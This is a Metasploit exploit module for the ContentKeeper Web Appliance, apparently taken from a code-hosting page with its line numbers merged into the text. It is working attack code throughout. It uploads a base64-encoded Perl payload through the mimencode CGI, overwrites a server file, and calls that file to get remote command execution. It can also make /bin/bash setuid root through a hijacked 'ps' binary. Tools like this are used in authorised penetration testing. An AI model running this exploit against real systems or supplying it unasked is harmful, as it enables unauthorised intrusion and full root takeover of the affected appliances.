Path: blob/master/modules/exploits/unix/http/contentkeeperweb_mimencode.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'ContentKeeper Web Remote Command Execution',15'Description' => %q{16This module exploits the ContentKeeper Web Appliance. Versions prior17to 125.10 are affected. This module exploits a combination of weaknesses18to enable remote command execution as the Apache user. By setting19SkipEscalation to false, this module will attempt to setuid the bash shell.20},21'Author' => [ 'aushack' ],22'Arch' => [ ARCH_CMD ],23'License' => MSF_LICENSE,24'References' => [25[ 'OSVDB', '54551' ],26[ 'OSVDB', '54552' ],27[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],28],29'Privileged' => false,30'Payload' => {31'DisableNops' => true,32'Space' => 1024,33'Compat' =>34{35'PayloadType' => 'cmd',36'RequiredCmd' => 'generic perl telnet',37}38},39'Platform' => ['unix'],40'Targets' => [41[ 'Automatic', {} ]42],43'DisclosureDate' => '2009-02-25',44'DefaultTarget' => 0,45'Notes' => {46'Reliability' => UNKNOWN_RELIABILITY,47'Stability' => UNKNOWN_STABILITY,48'SideEffects' => UNKNOWN_SIDE_EFFECTS49}50)51)5253register_options(54[55Opt::RPORT(80),56OptString.new('OVERWRITE', [ true, "The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc)", 'spamkeeper.dat']),57OptBool.new("SkipEscalation", [true, "Specify this to skip the root escalation attempt", false]),58]59)60end6162def check63connect64sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")65banner = sock.get_once(-1, 3)66disconnect6768if (banner =~ /500 Internal/)69return Exploit::CheckCode::Vulnerable70end7172return Exploit::CheckCode::Safe73end7475def exploit76exp = "#!/usr/bin/perl\n"77exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"78exp << "use IO::Socket::INET;\n"7980if (datastore['PAYLOAD'] =~ /perl/)81if not datastore['SkipEscalation']82print_status("Attempting to facilitate root escalation...")83exp << %q{ system("echo /bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;"); } # We can use either 'ps' or 'grep' but ps is fine.84end85exp << payload.encoded.gsub('perl -MIO -e ', '').gsub('\'', '') # We're already inside a perl script!86else87exp << "system(\""88exp << payload.encoded.gsub('"', '\"')89exp << "\");\n"90end9192body = Rex::Text.encode_base64(exp)9394connect9596sploit = "POST /cgi-bin/ck/mimencode?-u+-o+#{datastore['OVERWRITE']} HTTP/1.1\r\n"97sploit << "Host: #{datastore['RHOST']}\r\n"98sploit << "Content-Length: #{body.length}\r\n\r\n"99100print_status("Uploading payload to target...")101sock.put(sploit + body + "\r\n\r\n")102disconnect103104select(nil, nil, nil, 3) # Wait a few seconds..105print_status("Calling payload...")106connect107req = "GET /cgi-bin/ck/#{datastore['OVERWRITE']} HTTP/1.1\r\n" # Almost all files are owned by root, chmod'ed 777 :) rwx108req << "Host: #{datastore['RHOST']}\r\n"109sock.put(req + "\r\n\r\n")110111handler112disconnect113select(nil, nil, nil, 3) # Wait for session creation.114if not datastore['SkipEscalation'] and session_created? and datastore['PAYLOAD'] =~ /perl/115print_status("Privilege escalation appears to have worked!")116print_status("/bin/bash is now root setuid! Type 'bash -p' to get root.")117print_status("Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file).")118end119end120end121122123